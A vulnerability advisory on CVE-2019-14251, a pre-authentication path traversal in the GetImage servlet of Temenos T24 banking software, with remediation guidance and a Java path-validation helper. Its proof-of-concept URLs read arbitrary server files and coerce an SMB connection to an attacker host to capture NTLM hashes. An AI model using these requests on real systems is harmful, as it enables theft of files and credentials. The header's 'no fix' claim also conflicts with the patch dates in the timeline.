exploit/CVE-2019-14251-TEMENOS-T24.txt
###############################################################
#
# Pre-Authenticated Path Traversal in "GetImage" Java servlet (CWE-36)
#
###############################################################
#
# Publication date: to be defined
#
# Author:
# Bourbon Jean-marie (@kmkz_security) - Hacknowledge
# jean-marie@hacknowledge.lu
#
# Product Homepage: https://www.temenos.com/en/solutions/transact/core-banking-software/
# Source code download: N/A
#
# Tested on:
# Version: Build Version R15.01
#
###############################################################
# Pre-Authenticated Path Traversal (CWE-36)
#
# CVSSv3: 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
# OVE ID: OVE-20190724-0001
# CVE ID: CVE-2019-14251
#
###############################################################
# Fixes:
# No known available fix yet
###############################################################
I. PRODUCT

TEMENOS T24 is the most technically advanced banking system available today.
It combines the most comprehensive and flexible business functionality with the most advanced and scalable architecture.
This gives it unprecedented power to meet the challenges of today and the opportunities of tomorrow.
II. ADVISORY

An unauthenticated path traversal vulnerability was discovered that permits an attacker to exfiltrate data directly from the
T24 web server.
Using this weakness, an attacker might download any file, including sensitive ones containing credentials (mgmt-users.properties), or
use it to exfiltrate NTLM hashes via an SMB request to an attacker-controlled server in order to compromise the host.

III. VULNERABILITY DESCRIPTION

The login page contains a juicy JavaScript function that calls a servlet used to access documents on the server, in theory only once successfully authenticated.
This weakness allows attackers to traverse the file system and access files or directories outside of the restricted directory.
As shown below, "downloadDocServer()" reveals that the "GetImage" Java servlet takes a user-controlled path parameter to download a document; a malicious person can abuse it to read arbitrary files through path traversal without
needing to authenticate to the T24 application.
    function downloadDocServer()
    {
        pdfDownloadPath = escape(unescapeString(""));
        pdfDownloadLocation = escape(unescapeString(""));
        try
        {
            // the path used below is vulnerable to CWE-36 (path traversal), permitting extraction of NTLM hashes or access to any file on the server's filesystem
            openWindow=window.open('/WealthT24/GetImage?docDownloadPath='+pdfDownloadPath+'&uploadLocation='+pdfDownloadLocation+'','RafPrintWin',type="application/pdf",'toolbar=0,location=0,left=100,top=100,width=800,height=800');
            openWindow.focus();
        }
        catch (e)
        {
            alert("Either popup blocker is enabled or file cannot be downloaded for viewing at this moment.");
        }
    }
IV. PROOF OF CONCEPT

a) File access: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
b) NTLM hash extraction: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=\\192.168.19.135\test
V. RECOMMENDATIONS

The application should validate the user input before processing it.
Ideally, the validation should compare against a white-list of permitted values.
If that isn't possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.
After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path.
It should verify that the canonicalized path starts with the expected base directory.
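The following helper is an added illustration of the three steps recommended above (allow-list the input, append it to a fixed base directory, canonicalize and check the prefix); it is example code written for this advisory, not Temenos code, and the class name SafeDocumentResolver, the base directory and the sample document are assumptions. A servlet such as GetImage would pass the docDownloadPath and uploadLocation parameters through resolve() before opening anything.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.NoSuchFileException;
import java.nio.file.Path;
import java.util.regex.Pattern;

/**
 * Hypothetical helper (not Temenos code): resolves a user-supplied document
 * name against a fixed base directory and refuses anything that escapes it.
 */
public final class SafeDocumentResolver {

    // Allow-list: a plain file name only. No '/', '\', ':' or leading '.', so
    // relative traversal ("../"), absolute paths ("c:/windows/win.ini") and UNC
    // paths ("\\host\share") are all rejected before any filesystem access.
    private static final Pattern ALLOWED_NAME =
            Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,127}");

    private final Path baseDir;

    public SafeDocumentResolver(Path baseDir) throws IOException {
        // Canonicalize the base once so later startsWith() compares real paths.
        this.baseDir = baseDir.toRealPath();
    }

    /** Returns the canonical path of the requested document, or throws. */
    public Path resolve(String requested) throws IOException {
        if (requested == null || !ALLOWED_NAME.matcher(requested).matches()) {
            throw new IllegalArgumentException("document name not on the allow-list: " + requested);
        }
        // Append to the base and canonicalize with the platform filesystem API;
        // toRealPath() resolves ".." and symlinks and fails if the file is absent.
        Path real = baseDir.resolve(requested).toRealPath();
        // Defense in depth: a symlink inside baseDir pointing outside is refused too.
        if (!real.startsWith(baseDir)) {
            throw new SecurityException("resolved path escapes the document directory: " + real);
        }
        return real;
    }

    // Stand-alone demonstration on a temporary directory holding one constructed document.
    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("t24docs");
        Files.write(base.resolve("statement.pdf"), "constructed sample".getBytes());
        SafeDocumentResolver resolver = new SafeDocumentResolver(base);

        String[] inputs = {
            "statement.pdf",              // legitimate request
            "../../etc/passwd",           // relative traversal
            "c:/windows/win.ini",         // absolute path, as in PoC (a)
            "\\\\192.168.19.135\\test",   // UNC path, as in PoC (b)
        };
        for (String input : inputs) {
            try {
                System.out.println("ALLOW  " + input + " -> " + resolver.resolve(input));
            } catch (IllegalArgumentException | SecurityException | NoSuchFileException e) {
                System.out.println("REJECT " + input + " (" + e.getClass().getSimpleName() + ")");
            }
        }
    }
}
```

The allow-list alone already stops both proof-of-concept requests, since neither a drive letter nor a UNC prefix survives the regular expression; the canonicalization and startsWith() check remain as a second layer for names that pass the filter but still resolve outside the base, for example through a symbolic link.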
VI. TIMELINE

July 23rd, 2019: Vulnerability identification
July 24th, 2019: First contact with the editor (TEMENOS Team)
July 25th, 2019: CVE attribution
July 29th, 2019: Vulnerability acknowledgement + fix release from Temenos
August 1st, 2019: Patch released to customers
August 12th, 2019: First advisory released
August 19th, 2019: Temenos asked for removal of the publication
September 4th, 2019: Temenos informed that the responsible disclosure period (45 days) would expire the next day
December 5th, 2019: Advisory released

VII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.